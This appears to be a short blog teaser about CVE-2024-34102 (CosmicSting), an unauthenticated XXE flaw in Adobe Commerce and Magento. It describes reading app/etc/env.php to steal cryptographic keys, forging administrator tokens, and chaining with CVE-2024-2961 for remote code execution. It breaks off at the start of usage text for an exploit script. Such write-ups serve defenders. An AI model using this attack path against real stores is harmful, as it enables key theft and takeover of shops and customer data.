CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102) CVE-2024-34102 is a severe security flaw arising from improper handling of nested deserialization in Adobe Commerce and Magento. This vulnerability permits attackers to exploit XML External Entities (XXE) during the deserialization process, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors. This could lead to various security risks. Exploiting this vulnerability allows attackers to gain unauthorized admin access to REST API, GraphQL API, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems. This vulnerability poses a significant risk due to its ability to exfiltrate sensitive files, such as app/etc/env.php, containing cryptographic keys used for authentication. Attackers can exploit this to forge administrator tokens and manipulate Magento's APIs as privileged users. Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). The broader implications of XML External Entity (XXE) vulnerabilities enable attackers to retrieve and manipulate data from external sources, exacerbating the potential impact on compromised systems. Usage “` usage: exploit.py [-h] –target…Read More